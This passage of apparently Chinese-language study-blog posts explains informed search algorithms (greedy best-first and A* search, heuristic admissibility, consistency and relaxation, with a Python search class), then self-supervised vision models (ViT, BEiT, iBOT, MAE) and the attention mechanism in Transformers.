\text{// 对每个可能的动作生成子节点} \ \quad \quad \textbf{for each} \ \text{action in problem.}\text{ACTIONS}(node.\text{STATE}) \ \textbf{do} \ \quad \quad \quad \text{child} \leftarrow \text{CHILD-NODE}(problem, node, action) \ \quad \quad \quad \text{// 如果子节点状态不在explored和frontier中} \ \quad \quad \quad \textbf{if} \ \text{child.STATE is not in explored or frontier then} \ \quad \quad \quad \quad \text{// 将子节点插入frontier} \ \quad \quad \quad \quad \text{frontier} \leftarrow \text{INSERT}(child, frontier) \ \quad \quad \quad \text{// 如果子节点状态在frontier中且路径代价更低} \ \quad \quad \quad \textbf{else if} \ \text{child.STATE is in frontier with higher PATH-COST then} \ \quad \quad \quad \quad \text{// 用子节点替换frontier中的节点} \ \quad \quad \quad \quad \text{replace that frontier node with child} \ \end{array} $$

有信息搜索

有信息搜索是指在搜索过程中 使用启发信息 的搜索方法。有信息搜索方法通常会 根据启发信息来选择 下一个节点进行扩展,以 提高搜索效率

注意,有信息搜索的主要目的是提高搜索效率,但是提高了搜索效率不代表一定更好,反而可能会更差(丧失最优性)

informed_search

启发式函数可以看做这个图中的 $h(n)$,他是一个估计,而不一定是真实的。

贪婪最佳优先搜索 (Greedy Best-First Search, GBFS)

贪婪最佳优先搜索是一种有信息搜索方法,它通过启发式函数 $h(n)$ 来评估节点 $n$ 的优先级,然后选择优先级最高的节点进行扩展。贪婪最佳优先搜索的特点是每次都选择启发式函数值最小的节点进行扩展。

贪婪最佳优先搜索的启发式函数 $h(n)$ 通常是一个 估计 函数,它用来估计从节点 $n$ 到目标节点的最小成本。

  • 开节点集:优先队列(priority queue),按启发式函数值 $h(n)$ 排序。
  • 闭节点集:哈希表(hash table),存储已探索过的节点。

性质

完备性:贪婪最佳优先搜索没有完备性。类似 DFS,它可能沿着无限路径一直走(当然这得让启发式函数或者状态空间很差)

最优性:贪婪最佳优先搜索没有最优性。它找到的路径不一定是最优路径,因为它只考虑了当前节点的启发式函数值(贪心),在每一步它都选择 看似距离目标最近 的节点展开。因而可能会陷入局部最优解,而不是全局最优解。

注:一致代价搜索的估值函数(评估当前状态的函数)是 $f(n) = g(n)$,指代到达当前状态的路径的 真实花费;而贪婪最佳优先搜索的估值函数直接就是启发式函数,也即 $f(n) = h(n)$,指代当前状态到目标状态的 估计花费

时空复杂度分析

在最坏情况下,启发式函数足够的差,以至于它像宽度优先搜索那样遍历,而且还没搜到解,此时,时间、空间复杂度均为 $O(b^m)$,其中 $b$ 是分支因子,$m$​ 是最大深度。

如果启发式函数 $h(n)$ 是一个有效的估计函数,那么贪婪最佳优先搜索的时间复杂度和空间复杂度将会大幅降低。

A* 搜索算法

A*搜索算法是一种有信息搜索方法,它通过综合考虑节点的实际成本 $g(n)$ 和启发式函数值 $h(n)$ 来评估节点的优先级,然后选择优先级最高的节点进行扩展。A*搜索算法的特点是每次都选择 综合成本最小 的节点进行扩展。A*搜索算法是一种综合了一致代价搜索和贪婪最佳优先搜索的搜索方法

A* 搜索算法的估值函数为:

$$ f(n) = g(n) + h(n) $$

也即,A* 搜索算法的估值函数为预计经过节点 $n$ 到达目标节点的最短路径的花费。

  • 开节点集:优先队列(priority queue),按估值函数值 $f(n)$ 排序。
  • 闭节点集:哈希表(hash table),存储已探索过的节点。

A* 算法的最优性条件

A*搜索算法并不总是能找到最优解,但是它能够保证找到最优解的条件是:如果能够保证展开一个节点时,如果不展开它而是展开其他节点,一定不会有更优路径,那么 A* 算法就是最优的。

估值函数 $h (n)$ 的性质 [^2]
  • 可采纳性(Admissibility):如果 $h(n)$ 永远不会超过从节点 $n$ 到目标节点的真实代价,即 $h(n)$ 是真实代价的下限,$h(n) \leq h^*(n)$,其中 $h^*(n)$ 是实际最优代价,则称 $h(n)$ 是可采纳的。可采纳性保证了 A* 算法能够找到最优解。
  • 一致性(Consistency)/ 单调性(Monotonicity):对于所有节点 $n$ 和其可达的后续节点 $n'$,如果 $h(n)$ 满足三角不等式,即 $h(n) <= c(n, n') + h(n')$,其中 $c(n, n')$ 是从节点 $n$ 直接到达节点 $n'$ 的实际代价,则称 $h(n)$​ 是一致的。

可采纳性意味着我们的启发式函数是 乐观 的,我们的估计是 乐观估计

一致性是可采纳性的一种强化形式。它保证了 $h(n)$ 不仅不会高估到目标的代价(可以通过简单的将 $n'$ 选取为目标节点来证明),而且估计的增长与实际成本增长一致(单调性)。

极限情况下,$h(n) \equiv 0$,A* 算法就退化为一致代价搜索。

可以证明:

  • 对于树搜索,如果 $h(n)$ 是可采纳的,那么 A* 算法是最优的,也是完备的。
  • 对于图搜索,如果 $h(n)$​ 是一致的,那么 A* 算法是最优的。

在满足上述乐观估计的条件的情况下:

  • $h(n)$ 最好时,完全等于实际代价,即 $h(n) = h^*(n)$,在这种情况下,A* 算法的搜索路径几乎是直达路径,表现类似于贪心算法,因为它总是选择当前认为最优的路径。
  • $h(n)$ 最坏时,$h(n) \equiv 0$,此时,A* 算法退化为 Dijkstra 算法,也即一致代价搜索。因为综合代价函数 $f(n) = g(n) + h(n) = g(n)$。即每一步都只考虑从起点到当前节点的实际代价,而忽略到目标节点的估计代价。

A* 搜索的性质

  • 完备性:如果存在解,A* 搜索算法能够在有限的时间内找到解。

  • 最优性:见上文最优性讨论。

  • 最高效:给定 $f(n)$​ ,A* 是最高效的。

    假设最优解的总代价是 $C^*$,即:

    $$ C^* = g(n) + h(n) $$

    对于最优路径上的某个节点 $n$​。

    接着,全体节点可以分为两类:

    • 必要节点:由于 A*算法依照 $f(n)$ 由小到大展开,所以在找到最优解时及找到最优解之前,A*算法会展开所有 $f(n) \leq C^*$ 的节点。而这些节点确实都有 可能 是最优解路径上的一部分(注意,他们不是一定在,只是可能在,但是就是要搜索所有可能的节点才对)。
    • 不必要节点:如果一个节点 $n$ 的 $f(n) > C^$,那么它不可能在最优解路径上,因为它的总代价已经超过了最优解的总代价 $C^$​​,A* 算法不会浪费时间在他们上。

    这说明了 A* 算法在搜索过程中能够尽可能地减少搜索的节点数量,只展开了必要的节点,以达到效率最高的搜索。

    A* 的高效性基于优先队列的设计,与 $f(n)$ 直接相关,但与是否满足最优性无关。

  • A* 的实际效果取决于启发式函数的好坏

不过,对于大多数问题来说,在目标等高线之内($f(n) \leq C^*$)的状态数目相对于解路径的长度来说依旧是 指数关系

代码实现

一致代价、贪婪、A* 的代码框架是一样的,只是 $f(n)$ 不一样而已。

from copy import deepcopy
from queue import PriorityQueue
from typing import Callable

from interface.state import StateBase
from utils.show_path import show_reversed_path

class HeuristicSearch:
    # 定义启发式搜索的估值函数类型,输入为状态,输出为浮点数
    ValueEstimatorType = Callable[[StateBase], float]

    def __init__(self, state: StateBase):
        assert isinstance(state, StateBase)  # 确保传入的状态是StateBase类型
        self.initial_state = deepcopy(state)  # 对初始状态进行深拷贝,保证原始状态不被修改

    def search(self, value_of: ValueEstimatorType) -> None:
        states_queue = PriorityQueue()  # 使用优先队列存储待处理的状态,根据成本函数进行排序
        best_value_of = dict()  # 存储已知最好的到达各状态的成本
        last_state_of = dict()  # 存储到达某状态的最佳前驱状态

        states_queue.put((0, self.initial_state))  # 将初始状态入队,成本为0
        best_value_of[self.initial_state] = 0  # 初始状态的最佳成本设为0

        while not states_queue.empty():
            _, state = states_queue.get()  # 从队列中取出一个状态

            if state.success():  # 如果这个状态是目标状态
                break  # 结束搜索

            if state.fail():  # 如果这个状态无法继续或者失败
                continue  # 忽略此状态,继续处理队列中的下一个状态

            # 遍历当前状态可执行的所有操作,生成新状态
            for action in state.action_space():
                new_state = state.next(action)  # 生成新状态
                # 如果新状态未曾被发现,或新的路径成本低于已知的最佳成本
                if new_state not in best_value_of or value_of(new_state) < best_value_of[new_state]:
                    states_queue.put((-value_of(new_state), new_state))  # 将新状态加入队列
                    best_value_of[new_state] = value_of(new_state)  # 更新到达新状态的最佳成本
                    last_state_of[new_state] = state  # 记录到达新状态的前驱状态

        if state.success():
            show_reversed_path(last_state_of, state)  # 如果找到目标状态,显示从初始状态到目标状态的路径

启发式函数

上述有信息搜索算法都依赖于启发式函数,所以接下来我们讨论启发式函数本身。

启发式函数可以定义为是一种用于 评估节点优先级的函数,通常用于有信息搜索方法中。

启发式函数的作用是 估计 从节点 $n$​ 到目标节点的最小成本,以帮助搜索算法选择下一个节点进行扩展。

支配性

eight_digital

考虑以上八数码问题,我们要把左侧的状态变换为右侧的状态。在这个问题中,我们有如下两种启发式函数:

  • 启发式函数 $h_1(n)$:不在正确位置的数字个数。

    例如,对于上图中的状态,$h_1(n) = 8$。由于转换一个不在正确位置的数字到正确位置上至少需要 1 步(实际代价 ≥ 1),所以 $h1(n)$ 是可采纳的。

  • 启发式函数 $h_2(n)$:数字的当前位置和目标位置的曼哈顿距离之和(恰为每个数字到达正确位置的最小(注意,并非实际,实际还要考虑华容道那样的冲突)移动步数之和)。

    例如,对于上图中的状态,$h_2(n) = 18$。由于曼哈顿距离恰好给出了到达目标位置的最少步数,所以 $h_2(n)$ 也是可采纳的。

由定义可知,$h_2(n) \geq h_1(n)$,此时,我们说 $h_2(n)$ 支配 $h_1(n)$​。

同时,由于二者均具有可采纳性,即均严格小于或等于从节点 $n$ 到目标节点的实际代价,所以我们可以认为 $h_2(n)$ 比 $h_1(n)$ 更加有效,也就是 更优。因为这保证了使用 $h_2$ 的 A*不会比使用 $h_1$​ 的 A* 展开更多节点。

证明

由于 $h_2(n) \geq h_1(n)$,对于任意节点 $n$,有:

$$ f_2(n) = g(n) + h_2(n) \geq g(n) + h_1(n) = f_1(n) $$

这意味着,对于每个节点 $n$,使用 $h_2$ 的评估值 $f_2(n)$ 不小于使用 $h_1$ 的评估值 $f_1(n)$。

考虑节点展开顺序:A* 算法总是选择 $f(n)$ 最小的节点进行扩展。

  • 使用 $h_1$ 时,A* 会扩展节点 $n_1$。
  • 使用 $h_2$ 时,A* 会扩展节点 $n_2$。

由于 $f_2(n) \geq f_1(n)$,可以推论出 $n_2$ 的优先级不低于 $n_1$。

因此,使用 $h_2$ 时,A* 扩展的节点数不会比使用 $h_1$ 时更多。

特例

对于更一般的情况(即不是此问题,而是另一个问题),如果也有两个启发式函数 $h_2(n)$ 和 $h_1(n)$,同时满足可采纳性以及 $h_2(n) \geq h_1(n)$,我们可以有类似的推论,除非 $f(n) = g(n) + h_1(n) = g(n) + h_2(n) = C^*$,此时两个启发式函数完全等价。

另一个解释是,$h_2(n)$ 使用曼哈顿距离,同时给出了到达目标位置的最少步数,而 $h_1(n)$ 仅对不在位置的数字计数,仅提供了有多少数字需要移动。这使得 $h_2(n)$ 在大多数情况下是一个更精确或至少是更 “信息量丰富” 的启发式评估,这显然是有益于提高搜索效率的。

松弛法

松弛法是一种设计启发式函数的方法,它通过 减少对动作的限制 来创建原问题的松弛问题。

松弛问题的特点
  • 超图关系:松弛问题的状态图是原问题状态图的超图(点不变,边至少包含原先的边,可以有更多的边),因为它增加了可行动作,即在原图中增加了新的边。
  • 最优解关系:原问题的 最优解 也是松弛问题的 。如果新加的边提供了更短的路径,松弛问题 可能会有更优的解
松弛法的作用

产生可采纳启发式函数松弛问题的最优解 是对原问题的一个 可采纳的启发式函数,因为松弛意味着启发式函数 $h(n)$ 的值肯定小于等于真实的未来花费。

通过放松原问题的限制条件,可以产生多个松弛问题,每个问题对应一个启发式函数。

数学表达 [^3]

以下内容完全摘抄于原文,感谢作者提供的简明阐述。

  • 我们有一个问题 $P$,我们希望估计他的完美启发 $h^*$。
  • 我们定义了一个 更简单的问题 $P'$,它的完美启发 $h'^$ 可以用来 估计 $h^$。
  • 我们定义了一个转换 $r$,可以将 $P$ 中的实例简化为 $P'$ 的实例。
  • 给定实例 $\Pi \in P$,我们用 $h'^(r(\Pi))$ 来估计 $h^(\Pi)$。

松弛意味着简化问题,并将对较简单问题的解决方案作为对实际问题的启发式估计。

例子:寻路问题中的松弛

pathfinding

如果我希望找到一条从一个点到另一个点的路径,这可能是一个相当复杂的问题,具体取决于不同的点之间有多少条链接。该原始问题的简化问题可以是:寻找一条从一个点到另一个点的欧几里得距离,或者说,一只鸟从起点飞到终点的路径。

如何通过松弛推导出直线距离?

  • 问题 $P$:寻找路径。
  • 简化问题 $P'$:为一只鸟寻找路径。
  • $P'$ 的最佳启发 $h'^*$:直线距离。
  • 转换 $r$:假装你是一只鸟。
注意事项
  • 在设计启发式函数时,需要确保启发式函数的值不会超过真实的最优解,以保证算法的可采纳性。
  • 松弛法产生的启发式函数可能不是最优的,但它们提供了一个可行的估计,有助于搜索算法更快地找到解决方案。

复合式启发函数

在搜索算法中,一个最佳的启发式函数往往难以获得。当面临一组启发式函数 $h_1, ..., h_m$,且这些函数中没有一个是占统治地位的,我们可以采用复合式启发函数的方法来选择。

定义:复合式启发函数 $h(n)$ 定义为这组启发式函数中的最大值,即:

$$ h(n) = \max{h_1(n), ..., h_m(n)} $$

可采纳性与支配性:由于每个启发式函数 $h_i(n)$ 都是可采纳的,即它们不会高估到达目标的实际代价,因此复合式启发函数 $h(n)$ 也是可采纳的。同时,$h(n)$ 支配所有其他的启发式函数,因为它总是选择最大的估计值。

[^1]: How O(V+E) is equal to O(b^d) In BFS

[^2]: 天人合一 peng / 人工智能:模型与算法 2 搜索求解之启发式搜索

[^3]: YEY / 人工智能自动规划 05:生成启发函数

💾

ViT、BEiT、iBOT、MAE

2024年5月10日 09:16

Visual Transformer

  • 将标准 Transformer 迁移到 CV 任务上,尽可能少的做修改
  • 不引入 CNN 作为前置网络,因为这样会造成归纳偏置(局部性、平移等变性)
  • 将图片等分地划分为很多 patches,每个 patches 越小则计算量越大(序列长度越大),注意 Transformer 的计算复杂度是 序列长度 $n$ 的平方 $\mathcal{O}(n^2)$

BEiT

简介

  • 迁移 BERT 到视觉任务
  • 模型学习恢复原图像的 视觉令牌,而不是遮蔽块的原始像素

如何理解嵌入 / 令牌:图像具有很高的维度,但是并不是所有维度都是有用的(乱码图片),有些维度是冗余的,有些维度是有用的。令牌就是对图像的有用信息的一种抽象表示。通过将图像从高维像素空间映射(也就是嵌入)到(相对低维的)令牌空间,可以更好地捕捉图像的语义信息。并满足一些诸如相似者近、支持语义操作的特点。

dVAE

BEiT_dVAE

Tokenizer / Encoder

  • 首先切出 patch,并展平

  • 根据距离最近原则找到各个 patch 的离散 Token(Gumbel-softmax),加上位置嵌入与 cls 标记,cls 标记以 $\boldsymbol{e}_{[S]}$ 表示,$\boldsymbol{E}$ 是嵌入矩阵。cls 标记用于学习全局特征后,预测图像级别的标签,如分类任务。

    $$ \boldsymbol{H}0=[\boldsymbol{e}{[S]},\boldsymbol{E}x_i^p,\ldots,\boldsymbol{E}x_N^p]+\boldsymbol{E}_{pos} $$

  • Transformer 块 L 个

  • 输出图片的编码表示

Decoder

  • 根据图片的编码表示重建图片

Loss

因为我们想要能够从嵌入编码得到的分布中重新采样、解码得到的图片具有随机性,所以为了防止退化成一对一的编码、解码(AutoEncoder),我们人为的限制(表示随机性的)方差不得退化为 0,也即引入先验假设 $p(Z)=N(0, I)$。通过要求均值方差拟合网络的输出 $p(Z|X)$ 与标准正态分布 $N(0, I)$ 尽可能接近。这样的话,我们就有

$$ p(Z)=\sum_X p(Z|X)p(X)=\sum_X N(0,I)p(X)=N(0,I) $$

可以看到,在这个要求下,所得到的编码的分布也是一个正态分布,也就满足了我们的先验假设。

而这个过程,我们是通过引入额外的 KL 散度来实现的,也就是 ELBO 下界:

$$ \begin{aligned} &\text{KL}(N(\mu,\sigma^2)||N(0,1)) \ &= \int \frac{1}{\sqrt{2\pi\sigma^2}}e^{-(x-\mu)^2/2\sigma^2} \left(\log\frac{e^{-(x-\mu)^2/2\sigma^2}/\sqrt{2\pi\sigma^2}}{e^{-x^2/2}/\sqrt{2\pi}}\right)dx \ &= \int \frac{1}{\sqrt{2\pi\sigma^2}}e^{-(x-\mu)^2/2\sigma^2} \left(\log\left{\frac{1}{\sqrt{\sigma^2}}\exp\left{\frac{1}{2}[x^2-(x-\mu)^2/\sigma^2]\right}\right}\right)dx \ &= \frac{1}{2}\int \frac{1}{\sqrt{2\pi\sigma^2}}e^{-(x-\mu)^2/2\sigma^2}[-\log\sigma^2+x^2-(x-\mu)^2/\sigma^2]dx \ &= \frac{1}{2}(-\log\sigma^2+\mu^2+\sigma^2-1) \end{aligned} $$

接下来根据重建误差与 KL 散度加和构成的损失函数,训练 Tokenizer:

$$ L = \mathbb{E}{z\sim p\phi(z|x)}[\log q_\psi(x|z)]-D_{\text{KL}}[p_\phi(z|x),p(z)] $$

训练过程

BEiT

  • 预训练 dVAE / Tokenzier
  • 给定图片,切出 patches,通过预训练的 tokenizer(dVAE 里的 tokenizer 部分) 给出所有 patches 的 token
  • 盖住一些 patches(通过对位替换为一个特殊的、可学习的编码 ${\boldsymbol{e}}_{[\mathrm{m}]}$),通过 BEiT Encoder 预测盖住的这些个 patch 的相应的 visual token
  • 最大化对于盖住的 patches 输出真实 token 的概率

损失函数

dVAE

采用的是 ELBO 下界

$$ \sum_{(x_i,\tilde{x}i)\in\mathcal{D}}\log p(x_i|\tilde{x}i)\geq\sum{(x_i,\tilde{x}i)\in\mathcal{D}}\underbrace{(\mathbb{E}{z_i\sim q\phi(z|x_i)}[\log p_\psi(x_i|z_i)]}{\text{Visual Token Reconstruction}}-D{\mathrm{KL}}[q_\phi(z|x_i),p_\theta(z|\tilde{x}_i)]) $$

  • $x_i$: 原始输入图像。
  • $\tilde{x}_i$: 对原始图像进行一些遮挡处理后的图像。
  • $\mathcal{D}$: 数据集,包含训练数据对 $(x_i, \tilde{x}_i)$​​。

BEiT

总损失函数:

$$ \sum_{(x_i,\tilde{x}i)\in\mathcal{D}}(\underbrace{\mathbb{E}{z_i\sim q_\phi(z|x_i)}[\log p_\psi(x_i|z_i)]}{\text{Stage l: Visual Token Reconstruction}}+\underbrace{\log p\theta(\tilde{z}_i|\tilde{x}i)}{\text{Stage 2: Masked Image Modeling}}) $$

分为两个阶段:

Visual Token Reconstruction

  • $q_\phi(z|x_i)$: 条件概率分布,表示给定原始图像 $x_i$ 时,隐变量 $z$ 的概率分布。这个部分是通过预训练的 tokenizer 获取的。
  • $p_\psi(x_i|z_i)$: 条件概率分布,表示给定隐变量 $z_i$ 时,重建的原始图像 $x_i$ 的概率分布。

在这个阶段,目标是最大化重建的图像与原始图像之间的相似度,即通过最小化损失来进行训练 dVAE,尤其是其中的 Tokenizer

Masked Image Modeling

  • $p_\theta(z|\tilde{x}_i)$: 条件概率分布,表示给定遮挡后的图像 $\tilde{x}_i$ 时,隐变量 $z$ 的概率分布。

这个阶段的目标是通过 BEiT Encoder 预测被遮挡的 patches 对应的 visual token。这里的损失主要通过预训练的模型预测真实 token 来进行最小化。

问题

重建会更关注高频细节、短范围依赖。

iBOT

简介

  • 同一张图片经过不同的图像增强,仍应该具有相似的语义信息,所以采用
  • student 作为目标网络,teacher 作为 tokenizer,tokenizer 和目标网络同步学习

训练过程

iBOT

损失函数

自蒸馏

$$ \mathcal{L}{\left[\mathrm{CLS}\right]}=-P{\theta^{\prime}}^{\left[\mathrm{CLS}\right]}\left(v\right)^{\mathrm{T}}\log P_{\theta}^{\left[\mathrm{CLS}\right]}\left(u\right) $$

  • 对于一张图片,不同的数据增强过后,经过两个网络得到的信息应当相近
  • 为 $\texttt{[CLS]}$ 标签上的自蒸馏,不同的数据增强上交叉进行
  • 目标是使学生网络的输出逼近教师网络的输出,提高预测一致性。

MIM

$$ \mathcal{L}\mathrm{MIM}=-\sum{i=1}^N:m_i\cdot P_{\boldsymbol{\theta'}}^\mathrm{patch}(\boldsymbol{u}i)^\mathrm{T}:\log P{\boldsymbol{\theta}}^\mathrm{patch}(\hat{\boldsymbol{u}}_i) $$

  • $m_i$ 是掩码,用于只选择被 Mask 部分

  • 为 patch 标签上的自蒸馏,同一数据增强上进行

  • 计算同一张图片在老师 - 学生间重构的交叉熵,可以替换得到 $v$ 的对称化损失

  • 使用 EMA + 学生模型的梯度(而不是老师模型自己的梯度),来更新老师模型

    EMA

  • 共享参数,可以得到更好的效果:

    $$ h_s^{[\operatorname{CLS}]}=h_s^{\mathrm{patch}}\quad h_t^{[\operatorname{CLS}]}=h_t^{\mathrm{patch}} $$

伪代码

iBOT_pesudo_code

输入变量、初始化

  • $g_s$ 和 $g_t$: 学生网络和教师网络,用于特征提取。
  • $C, C'$: 分别是基于 $\texttt{[CLS]}$ token 和图像块(patch)tokens 的中心。
  • $\tau_s, \tau_t$ 和 $\tau'_s, \tau'_t$: 分别是学生和教师网络在 $\texttt{[CLS]}$ token 和图像块(patch)tokens 上的温度参数,用于控制软标签的 “锐化” 程度。
  • $l, m, m'$: 分别是网络、 $\texttt{[CLS]}$​ token 和图像块(patch)tokens 的动量更新率。
  • 将教师网络的参数初始化为学生网络的参数,使其在开始时保持一致。

循环

  1. 数据加载和增强
    • 通过数据加载器循环遍历数据,每次处理一个批次的数据 $x$。
    • 对每个数据点 $x$ 进行两次随机视图生成(augment),得到 $u$ 和 $v$。
  2. 遮蔽操作
    • 对 $u$ 和 $v$ 进行随机的块状遮蔽,生成 $\hat u$ 和 $\hat v$,同时记录遮蔽的位置 $m_u$ 和 $m_v$。
  3. 特征提取
    • 使用学生网络 $g_s$ 和教师网络 $g_t$ 处理遮蔽后和未遮蔽的视图,提取 $\texttt{[CLS]}$ token 和图像块(patch)tokens 的特征。
  4. 损失函数计算
    • $\mathcal{L}_\texttt{[CLS]}$ 计算学生和教师网络输出的 $\texttt{[CLS]}$ token 特征之间的差异。
    • $\mathcal{L}_\mathrm{MIM}$ 计算图像块(patch)tokens 特征之间的差异,其中只有遮蔽的部分参与计算。
  5. 反向传播和参数更新
    • 计算总损失并执行反向传播。
    • 更新学生网络的参数,并根据动量率更新教师网络的参数。
    • 更新中心 $C$ 和 $C'$​,使用动量平均策略。

辅助函数 $\mathrm{H}$

  • 计算两组特征之间的信息熵损失。这个函数首先停止梯度传递到 $t$
  • 对 $s$ 和 $t$​ 应用 softmax 操作进行归一化,然后计算交叉熵。

问题

  • 如何更好的理解 EMA 以及蒸馏的过程,为什么老师的输出可能更好?

MAE

训练过程

MAE

  • 首先对图片切出 patches,然后随机掩蔽(通过打乱后取前面一部分来实现),只取没被掩蔽的部分输入 encoder,尝试得到具有语义信息的 token
  • 通过一个全连接层适配到 decoder_embed,然后依照顺序插入 [Mask]
  • 使用 decoder 恢复到像素空间,使用 MSE 计算损失

Credit

💾

注意力机制与 Transformer

2024年4月21日 03:12

动机

早期序列建模方法具有局限性:

  • RNN(循环神经网络):RNN 能够处理序列数据,但在处理长序列时存在梯度消失与梯度爆炸问题。

  • LSTM(长短时记忆)GRU(门控循环单元):为解决 RNN 的梯度问题,引入了更复杂的结构,如 LSTM 和 GRU,但计算效率相对较低。

  • CNN(卷积神经网络):虽然主要用于图像处理,但也可以应用于序列数据,如文本分类。然而,CNN 的感受野有限,不能直接捕捉全局依赖关系。

为了解决这些问题,注意力机制被引入。

首先明确一点,注意力是稀有资源,我们只有有限的处理能⼒,所以需要忽略无关的信息。

考虑人类视觉注意力的特点:

  • 非自主性提示:外部环境的刺激会引起人们的注意。如一堆书中的一本书的颜色与其他书不同,会引起人们的注意。
  • 自主性提示:自主性注意力是指人们在没有外部提示的情况下,根据自己的兴趣和目标选择注意的对象。如在一堆书中,人们会选择自己感兴趣的书。

human_attention

注意力机制

不同于过往的深度学习模型,Transformer 摒弃了过往的循环机制 (这会导致梯度消失),使用了 自注意力机制

自注意力机制是一种计算序列中各个元素之间的依赖关系的方法。在自注意力机制中,每个元素都可以与序列中的其他元素相互作用,从而捕捉 长距离依赖关系

qkv

注意力提示:查询、键、值

  • 非自主性提示:键(Key)、值(Value),他们以 成对 的形式给出。
  • 自主性提示:查询(Query)
  • 注意力汇聚:打分函数,注意力权重矩阵,加权平均

注意力汇聚数学表达如下:

$$ f(x)=\sum_{i=1}^n\alpha(x,x_i)y_i $$

其中:

  • $x$ 是查询向量(Query),可以理解为当前的单词
  • $x_i$ 是键向量(Key),可以理解为前文(数据)中的所有单词(每个 $i$ 对应一个单词)
  • $y_i$ 是值向量(Value),可以理解为前文(数据)中的所有单词的某种特征(如嵌入向量)
  • $\alpha(x,x_i)$ 是 注意力打分函数

可以看到,我们先将查询向量(Query)和键向量(Key)通过打分函数做了复合,得到了 注意力权重,然后将值向量(Value)与注意力权重做了 加权平均 (这里还要求了一下注意力汇聚部分的输出是一个加和为 1 的概率分布,所以可以在其中接一个 Softmax),从而得到了最终的输出。

直到现在,我们谈论的还是普通的注意力机制,因为打分函数 $\alpha(x,x_i)$ 可以是一个 固定的函数,这是一种特殊情况。例如,采用核方法,可以将 $\alpha(x,x_i)$ 定义为高斯核函数,这样就可以得到一个固定的注意力机制。

这里提到的核方法可以在 D2L / 注意力汇聚:Nadaraya-Watson 核回归 中找到更多信息。

自注意力机制(Self-Attention)

自注意力机制是注意力机制的一种特殊形式,其中 查询、键和值都来自同一个地方,即输入序列。

self-attention

其中:

  • Q、K、V 是三个不同的空间,图中得到 Q、K、V 都是对于输入序列完成了线性变换。我们首先将输入序列转换为 嵌入表示, 然后,通过三个不同的线性层投影 $W_q$、 $W_k$ 和 $W_v$,分别生成 查询矩阵(Q)、键矩阵(K)和值矩阵(V)。这三个矩阵将用于计算注意力输出。
  • $N$ 是序列长度
  • $D_x$ 是嵌入的特征维度
  • $D_k$ 是 Q、K、V 矩阵的维度,也叫 head dim

self_attention_2

打分函数:缩放点积注意力(Scaled Dot-Product Attention)

缩放点积注意力 是一种计算模型中不同位置之间相互关注程度的方法。这里的 “注意力” 可以理解为模型在处理数据时赋予不同部分的重要性。具体来说,它通过以下步骤实现。

查询(Q)、键(K)、值(V)矩阵的生成

首先,输入数据 $X$ 经过三个不同的权重矩阵 $W_q$、$W_k$、$W_v$ 转换,得到对应的查询(Q)、键(K)、值(V)矩阵。

这里 $D_x$ 表示输入数据的特征维度,$D_k$ 表示转换后的特征维度(这里要求 Q、K、V 中都相等),$N$ 表示序列长度。

计算注意力得分

然后,使用矩阵乘法计算查询(Q)和键(K)的相似度,得到一个注意力权重矩阵。

这个注意力权重矩阵可以通过以下公式计算:

$$ \text{softmax}\left(\frac{K^T Q}{\sqrt{D_k}}\right) $$

这里通过除以 $\sqrt{D_k}$​ 进行缩放(缩放点积),防止相似度矩阵中的数值过大(累次运算的影响),使梯度保持稳定(想想 Softmax 在大数值时会导致梯度消失)。

这里注意,除以 $\sqrt{D_k}$ 进行缩放是对 $K^T Q$ 得到的 $N \times N$ 矩阵的所有元素各自进行的。这里每个元素都是一个 $[1,D_k] \times[D_k,1]$ 得到的值,所有他的扩大的了 $D_k$ 倍,因而需要缩放点积。后文给出证明。

这里要求了 Q、K 的维度相同,这样才能进行矩阵乘法。

Proof by GPT4:

在统计学中,如果向量中的每个元素都是独立的随机变量,并且每个元素都有零均值(0)和单位方差(1),那么这些元素的点积的均值确实是 0。这是因为均值是期望值的线性运算,当两个独立随机变量的均值都为 0 时,它们的乘积的期望值也为 0。

具体来说,对于两个向量 $\mathbf{q}$ 和 $\mathbf{k}$,它们的点积是:

$$ \mathbf{q}^\top \mathbf{k} = \sum_{i=1}^{d} q_i k_i $$

由于 $q_i$ 和 $k_i$ 都是独立的随机变量,且均值为 0,所以点积的期望值(均值)是:

$$ E[\mathbf{q}^\top \mathbf{k}] = E\left[\sum_{i=1}^{d} q_i k_i\right] = \sum_{i=1}^{d} E[q_i k_i] = \sum_{i=1}^{d} E[q_i]E[k_i] = 0 $$

现在让我们来看方差。对于两个独立随机变量 $X$ 和 $Y$,其乘积的方差是:

$$ \text{Var}(XY) = E[X^2]E[Y^2] - (E[X]E[Y])^2 $$

由于 $q_i$ 和 $k_i$ 的均值为 0,上述公式简化为:

$$ \text{Var}(q_i k_i) = E[q_i^2]E[k_i^2] $$

因为 $q_i$ 和 $k_i$ 的方差都是 1(单位方差),所以 $E[q_i^2] = \text{Var}(q_i) = 1$ 和 $E[k_i^2] = \text{Var}(k_i) = 1$。那么对于每一对 $q_i$ 和 $k_i$,它们乘积的方差是 1。

最后,考虑到点积是所有这些乘积的和,且这些乘积是独立的,所以点积的总方差是各个乘积方差的和:

$$ \text{Var}(\mathbf{q}^\top \mathbf{k}) = \sum_{i=1}^{d} \text{Var}(q_i k_i) = d $$

因此,当向量 $\mathbf{q}$ 和 $\mathbf{k}$ 的长度为 $d$,且它们的元素都有零均值和单位方差时,它们的点积的均值为 0,方差为 $d$。这就是为什么在缩放点积注意力机制中需要除以 $\sqrt{d}$ 来保持方差的一致性,不受向量长度的影响。

归一化

对缩放后的相似度矩阵应用 Softmax 函数,使得 每一列(注意不是矩阵全体) 的值加起来等于 1,也即转换为 概率分布,这个概率分布表示每个键对应的注意力权重。

$$ \text{Attention}(Q, K, V) = \text{softmax}\left(\frac{K^T Q}{\sqrt{D_k}}\right) V $$

将之前得到的注意力权重矩阵与值($V$)矩阵相乘,得到最终的输出矩阵 $H$,它是输入序列的 加权表示,其中的权重由注意力得分决定。

加性注意力(Additive Attention)

加性注意力是另一种用于计算查询和键之间相似度的方法。它首先将查询和键分别经过线性变换(全连接层), 然后将两者相加,并通过非线性激活函数(如 $\tanh$)计算相似度。接下来,使用可学习的权重向量计算最终的相似度分数。

Attention 机制的计算公式如下:

$$ \text{Attention}(Q, K, V) = \text{softmax}(\text{tanh}(Q * W_q + K * W_k) * V^a) * V $$

其中:

  • $Q$: 查询向量(Query)集合。
  • $K$: 键向量(Key)集合。
  • $V$: 值向量(Value)集合。
  • $W_q$: 查询向量的线性变换矩阵。
  • $W_k$: 键向量的线性变换矩阵。
  • $V^a$: 表示可学习的权重向量
  • $+$: 向量或矩阵的加法。
  • $\tanh$: 表示应用 $\tanh$ 非线性激活函数

